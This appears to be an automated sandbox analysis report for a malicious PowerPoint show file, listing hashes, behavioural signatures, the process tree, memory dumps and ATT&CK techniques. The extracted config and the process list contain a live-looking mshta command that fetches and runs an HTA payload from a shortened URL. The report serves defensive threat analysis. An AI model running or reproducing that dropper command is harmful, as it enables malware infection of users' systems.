a1e8da85d99cfb4c8569ea850691cf6c565b6083114198e17369f3013e4016b5

General

Target

RETO-MALWAREDFIR.pps
Size

133KB
MD5

00d7a6d6029559fa2fb656d906f7c5e4
SHA1

42eb2e085ba018868c8a4018341516d843154b30
SHA256

a1e8da85d99cfb4c8569ea850691cf6c565b6083114198e17369f3013e4016b5
SHA512

dff64ad6a392d49adf39c6c3154888651068a7e58ed70e7cd40fea6eed0ad31a41295cd197e60c6fb4b18ebe89fd707bb373edf4235f9f4c6fbdeebd2766d856
SSDEEP

1536:6slfQ+C4xIytrmsKemd8JkpuJFeOMn63nMq5Z+av1Dc3N:6sV7rmsKemuJkpuJtE6cq5BpmN

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://12384928198391823%12384928198391823@j.mp/hdkjashdkasbctdgjsa

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mSHtA.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1244	1876	mSHtA.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	5116	1876	ping.exe	POWERPNT.EXE

Blocklisted process makes network request 6 IoCs

Processes:

mSHtA.exe

flow pid process

56 1244 mSHtA.exe
58 1244 mSHtA.exe
60 1244 mSHtA.exe
66 1244 mSHtA.exe
68 1244 mSHtA.exe
69 1244 mSHtA.exe

flow	pid	process
56	1244	mSHtA.exe
58	1244	mSHtA.exe
60	1244	mSHtA.exe
66	1244	mSHtA.exe
68	1244	mSHtA.exe
69	1244	mSHtA.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

ping.exe

pid process

5116 ping.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1876 POWERPNT.EXE
4220 winword.exe
4220 winword.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1876 POWERPNT.EXE
4220 winword.exe
4220 winword.exe
4220 winword.exe
1876 POWERPNT.EXE

pid	process
5116	ping.exe

pid	process
1876	POWERPNT.EXE
4220	winword.exe
4220	winword.exe

pid	process
1876	POWERPNT.EXE
4220	winword.exe
4220	winword.exe
4220	winword.exe
1876	POWERPNT.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

POWERPNT.EXE

description	pid	process	target process
PID 1876 wrote to memory of 1244	1876	POWERPNT.EXE	mSHtA.exe
PID 1876 wrote to memory of 1244	1876	POWERPNT.EXE	mSHtA.exe
PID 1876 wrote to memory of 5116	1876	POWERPNT.EXE	ping.exe
PID 1876 wrote to memory of 5116	1876	POWERPNT.EXE	ping.exe
PID 1876 wrote to memory of 4220	1876	POWERPNT.EXE	winword.exe
PID 1876 wrote to memory of 4220	1876	POWERPNT.EXE	winword.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\RETO-MALWAREDFIR.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\SYSTEM32\mSHtA.exe
mSHtA http://12384928198391823%12384928198391823@j.mp/hdkjashdkasbctdgjsa
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:1244

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:5116

C:\Program Files\Microsoft Office\Root\Office16\winword.exe
winword
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4220

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FDA3C785-0C12-47B1-BE0E-A31CB6FEEBB7
Filesize
160KB

MD5
f6e01358c63032bf2a0c3a55a0c29bc7

SHA1
185ea6cae051d86fef1d07072089b31a0a12f282

SHA256
dcca8707f94f838d73fce85f4fdd27d05fd7c7c0f8ea3b8590b01e4ca8c41edd

SHA512
b849e599f2ef76a093b91f7f149a38c5a6ffbbdee552af9aa1d0d095f646b97b27d3e163e75c98b55366be19258764c7de1e97e1f6f7e1b8026c3883b6098a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
Filesize
2KB

MD5
771c26a22f00326d1ea17da2d34e1c5a

SHA1
ae3084d5eeba191d077fd072f2bd8880a5dc0d1c

SHA256
e416110aa89cd15e525f523c0b49a3c428b4002e3fe95230a33c5a8748fcb148

SHA512
e76a09228dfc8ddd906a31b80aa7738915026f9548f7bf3704530a04d8502f5b53f55387eb712ef54078a224265c9fb5c6ed295348ecdd02d3a0798fb30e1835

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\f3df91c436730d7a37c58d5f25d9bf4a56fa3a34.tbres
Filesize
4KB

MD5
5da31dd3f96077558fbac2a11bc8934f

SHA1
d92db31fce55c50657b7aa193cdc0d66c6e704a1

SHA256
608a6483e2495c57a546d50cc33d1e5edc0fd91811ca3115c16ef9d9648eb6ea

SHA512
2cee7e06bdf8431060160dd932ffacd5b61fdc4816d1bfdd662d347ca6e08dc4a76e5424b1ec89366eb8e4c1c8f74eaad933cb1aee932ddd4bda8a8e0c3a8338

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDA6F3.tmp\gb.xsl
Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
memory/1876-13-0x00007FFE584F0000-0x00007FFE58500000-memory.dmp

Filesize
64KB

Download
memory/1876-90-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-7-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-8-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-6-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-9-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-1-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-11-0x00007FFE584F0000-0x00007FFE58500000-memory.dmp

Filesize
64KB

Download
memory/1876-12-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-0-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-15-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-14-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-16-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-17-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-18-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-19-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-25-0x000001B654100000-0x000001B654500000-memory.dmp

Filesize
4.0MB

Download
memory/1876-26-0x000001B654720000-0x000001B654F20000-memory.dmp

Filesize
8.0MB

Download
memory/1876-106-0x000001B654100000-0x000001B654500000-memory.dmp

Filesize
4.0MB

Download
memory/1876-105-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-103-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-104-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-100-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-102-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-101-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-10-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-99-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-98-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-97-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-5-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-3-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/1876-4-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/1876-2-0x00007FFE5A550000-0x00007FFE5A560000-memory.dmp

Filesize
64KB

Download
memory/4220-609-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-73-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-52-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-54-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-70-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-69-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-67-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-75-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-45-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-587-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-71-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-51-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-49-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-47-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-64-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-65-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-66-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download
memory/4220-74-0x00007FFE9A4D0000-0x00007FFE9A6C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads